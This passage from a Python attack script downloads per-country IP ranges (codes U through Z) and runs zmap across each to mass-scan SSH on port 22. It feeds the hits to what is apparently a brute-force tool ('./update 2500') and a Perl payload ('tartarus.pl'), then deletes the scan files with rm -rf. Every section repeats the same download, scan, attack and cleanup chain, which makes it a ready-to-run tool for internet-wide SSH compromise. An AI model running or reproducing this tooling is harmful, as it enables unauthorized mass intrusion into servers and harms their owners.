vex('wget http://ipdeny.com/ipblocks/data/countries/ug.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"um.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/um.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"us.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/us.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"uy.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/uy.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"uz.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/uz.zone')
print(""+ red +"Finished"+ white +"!")
time.sleep(2)
vex('clear')
vex('zmap -p22 -w ua.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ua.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ug.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ug.zone vuln.txt mfu.txt')
vex('zmap -p22 -w um.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf um.zone vuln.txt mfu.txt')
vex('zmap -p22 -w us.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf us.zone vuln.txt mfu.txt')
vex('zmap -p22 -w uy.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf uy.zone vuln.txt mfu.txt')
vex('zmap -p22 -w uz.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf uz.zone vuln.txt mfu.txt')

#########################################
# __      __   ______                
# \ \    / /  |___  /                
#  \ \  / /_____ / / ___  _ __   ___ 
#   \ \/ /______/ / / _ \| '_ \ / _ \
#    \  /      / /_| (_) | | | |  __/
#     \/      /_____\___/|_| |_|\___|
#########################################


print(""+ white +"Downloading "+ red +"V-Zone "+ white +"Collection..")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"va.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/va.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"vc.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/vc.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ve.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ve.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"vg.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/vg.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"vi.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/vi.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"vn.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/vn.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"vu.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/vu.zone')
print(""+ red +"Finished"+ white +"!")
time.sleep(2)
vex('clear')
vex('zmap -p22 -w va.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf va.zone vuln.txt mfu.txt')
vex('zmap -p22 -w vc.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf vc.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ve.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ve.zone vuln.txt mfu.txt')
vex('zmap -p22 -w vg.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf vg.zone vuln.txt mfu.txt')
vex('zmap -p22 -w vi.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf vi.zone vuln.txt mfu.txt')
vex('zmap -p22 -w vn.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf vn.zone vuln.txt mfu.txt')
vex('zmap -p22 -w vu.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf vu.zone vuln.txt mfu.txt')

#########################################
# __          __   ______                
# \ \        / /  |___  /                
#  \ \  /\  / /_____ / / ___  _ __   ___ 
#   \ \/  \/ /______/ / / _ \| '_ \ / _ \
#    \  /\  /      / /_| (_) | | | |  __/
#     \/  \/      /_____\___/|_| |_|\___|
#########################################


print(""+ white +"Downloading "+ red +"W-Zone "+ white +"Collection..")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"wf.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/wf.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ws.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ws.zone')
print(""+ red +"Finished"+ white +"!")
time.sleep(2)
vex('clear')
vex('zmap -p22 -w wf.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf wf.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ws.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ws.zone vuln.txt mfu.txt')
#########################################
# __     __   ______                
# \ \   / /  |___  /                
#  \ \_/ /_____ / / ___  _ __   ___ 
#   \   /______/ / / _ \| '_ \ / _ \
#    | |      / /_| (_) | | | |  __/
#    |_|     /_____\___/|_| |_|\___|
#########################################


print(""+ white +"Downloading "+ red +"Y-Zone "+ white +"Collection..")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ye.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ye.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"yt.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/yt.zone')
print(""+ red +"Finished"+ white +"!")
time.sleep(2)
vex('clear')
vex('zmap -p22 -w ye.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ye.zone vuln.txt mfu.txt')
vex('zmap -p22 -w yt.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf yt.zone vuln.txt mfu.txt')

#########################################
#  ______   ______                
# |___  /  |___  /                
#    / /_____ / / ___  _ __   ___ 
#   / /______/ / / _ \| '_ \ / _ \
#  / /__    / /_| (_) | | | |  __/
# /_____|  /_____\___/|_| |_|\___|
#                                 
#########################################


print(""+ white +"Downloading "+ red +"Z-Zone "+ white +"Collection..")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"za.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/za.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"zm.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/zm.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"zw.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/zw.zone')
print(""+ red +"Finished"+ white +"!")
time.sleep(2)
vex('clear')
vex('zmap -p22 -w za.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf za.zone vuln.txt mfu.txt')
vex('zmap -p22 -w zm.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf zm.zone vuln.txt mfu.txt')
vex('zmap -p22 -w zw.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf zw.zone vuln.txt mfu.txt')
